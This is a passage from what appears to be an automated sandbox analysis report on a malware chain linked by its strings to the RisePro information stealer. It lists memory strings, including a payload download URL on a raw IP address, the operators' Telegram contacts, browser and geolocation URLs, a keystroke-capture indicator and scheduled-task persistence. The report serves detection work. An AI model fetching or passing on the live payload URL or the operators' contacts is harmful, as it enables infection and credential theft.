Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exeateid
Source: eaa97795e9.exe, 00000008.00000003.2223816206.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000003.2313995874.0000000005110000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2314685161.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2330868888.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2410780137.0000000005470000.00000004.00001000.00020000.00000000.sdmp, eaa97795e9.exe, 00000018.00000003.2497539627.0000000005540000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6958028505.0000000000D81000.00000040.00000001.01000000.00000011.sdmp, RageMP131.exe, 0000001B.00000003.2575871276.0000000005110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MPGPH131.exe, 0000000E.00000003.3214797316.000000000142E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2962983581.0000000001105000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.3215347767.0000000001139000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.3193475206.0000000000634000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2999593925.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: MPGPH131.exe, 0000000F.00000003.2962983581.0000000001105000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.3215347767.0000000001139000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/H=
Source: eaa97795e9.exe, 00000013.00000003.3193475206.0000000000634000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2999593925.00000000005F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/X
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/_d
Source: eaa97795e9.exe, 00000013.00000003.2999593925.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.3193517047.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33FL4Q
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33Jh
Source: MPGPH131.exe, 0000000F.00000003.3215443707.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2962983581.00000000010EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33N?
Source: RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33y
Source: MPGPH131.exe, 0000000F.00000003.3215443707.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2962983581.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.33
Source: RageMP131.exe, 0000001B.00000002.6959010221.0000000001447000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.33jL4
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: MPGPH131.exe, 0000000F.00000003.3215443707.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2962983581.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2999593925.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.3193517047.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: eaa97795e9.exe, 00000008.00000003.2223816206.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000003.2313995874.0000000005110000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2314685161.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2330868888.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2410780137.0000000005470000.00000004.00001000.00020000.00000000.sdmp, eaa97795e9.exe, 00000018.00000003.2497539627.0000000005540000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6958028505.0000000000D81000.00000040.00000001.01000000.00000011.sdmp, RageMP131.exe, 0000001B.00000003.2575871276.0000000005110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: RageMP131.exe, 0000001B.00000002.6959010221.000000000149C000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959010221.00000000014B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RageMP131.exe, 0000001B.00000002.6959010221.000000000149C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33Op=6
Source: RageMP131.exe, 0000001B.00000003.3083983177.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959010221.00000000014C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/x
Source: MPGPH131.exe, 0000000F.00000003.3215443707.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2962983581.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RageMP131.exe, 0000001B.00000002.6959010221.0000000001447000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.332
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: RageMP131.exe, 0000001B.00000002.6959010221.0000000001447000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959624442.0000000001540000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTlbBaNN
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001540000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTy
Source: eaa97795e9.exe, 00000013.00000003.3193475206.0000000000634000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2999593925.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro
Source: RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: MPGPH131.exe, 0000000F.00000003.2962983581.0000000001105000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.3215347767.0000000001139000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot1
Source: MPGPH131.exe, 0000000E.00000003.3214797316.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot33
Source: eaa97795e9.exe, 00000013.00000003.3193475206.0000000000634000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2999593925.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botSS
Source: MPGPH131.exe, 0000000F.00000003.2962983581.0000000001105000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.3215347767.0000000001139000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botSS8
Source: RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: MPGPH131.exe, 0000000E.00000003.3214797316.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_botw
Source: MPGPH131.exe, 0000000F.00000003.2962983581.0000000001105000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.3215347767.0000000001139000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botlater
Source: RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botriseprok
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RageMP131.exe, 0000001B.00000003.6767587819.0000000001692000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.6614411368.0000000007F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RageMP131.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/1i
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/2h
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/ata
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 8bcaec3fef.exe, 00000009.00000003.2546160709.000000000A8B5000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000003.2546673409.000000000A8B6000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000002.2572103242.000000000A8B6000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000003.2547534253.000000000A8D6000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000002.2572183410.000000000A8D6000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000003.2530747589.000000000A82C000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000003.2530819656.000000000A82F000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000003.2547834598.000000000A83E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.12:443 -> 192.168.2.5:49942 version: TLS 1.2
Installs a raw input device (often for capturing keystrokes)
Source: 8bcaec3fef.exe, 00000009.00000003.2530678022.000000000A7AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_b28e5b55-1

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 8bcaec3fef.exe, 00000009.00000002.2559987207.00000000004C2000.00000040.00000001.01000000.0000000D.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2cbae11c-e
Source: 8bcaec3fef.exe, 00000009.00000002.2559987207.00000000004C2000.00000040.00000001.01000000.0000000D.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_5aa95985-8
PE file contains section with special chars
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: explortu.exe.0.dr Static PE information: section name:
Source: explortu.exe.0.dr Static PE information: section name: .idata
Source: explortu.exe.0.dr Static PE information: section name:
Source: random[1].exe.2.dr Static PE information: section name:
Source: random[1].exe.2.dr Static PE information: section name: .idata
Source: random[1].exe.2.dr Static PE information: section name:
Source: 8bcaec3fef.exe.2.dr Static PE information: section name:
Source: 8bcaec3fef.exe.2.dr Static PE information: section name: .idata
Source: 8bcaec3fef.exe.2.dr Static PE information: section name:
Source: sarra[1].exe.2.dr Static PE information: section name:
Source: sarra[1].exe.2.dr Static PE information: section name: .idata
Source: sarra[1].exe.2.dr Static PE information: section name:
Source: random[1].exe0.2.dr Static PE information: section name:
Source: random[1].exe0.2.dr Static PE information: section name: .idata
Source: random[1].exe0.2.dr Static PE information: section name:
Source: b6042db502.exe.2.dr Static PE information: section name:
Source: b6042db502.exe.2.dr Static PE information: section name: .idata
Source: b6042db502.exe.2.dr Static PE information: section name:
Source: random[1].exe1.2.dr Static PE information: section name:
Source: random[1].exe1.2.dr Static PE information: section name: .idata
Source: random[1].exe1.2.dr Static PE information: section name:
Source: eaa97795e9.exe.2.dr Static PE information: section name:
Source: eaa97795e9.exe.2.dr Static PE information: section name: .idata
Source: eaa97795e9.exe.2.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: .idata
Source: axplong.exe.5.dr Static PE information: section name:
Source: RageMP131.exe.8.dr Static PE information: section name:
Source: RageMP131.exe.8.dr Static PE information: section name: .idata
Source: RageMP131.exe.8.dr Static PE information: section name:
Source: MPGPH131.exe.8.dr Static PE information: section name:
Source: MPGPH131.exe.8.dr Static PE information: section name: .idata
Source: MPGPH131.exe.8.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E690C0 NtDuplicateObject,CreateThread, 27_2_00E690C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E69A70 RtlAllocateHeap,NtQuerySystemInformation,HeapFree,RtlFreeHeap,RtlAllocateHeap,NtQuerySystemInformation,HeapFree, 27_2_00E69A70
Creates files inside the system directory
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
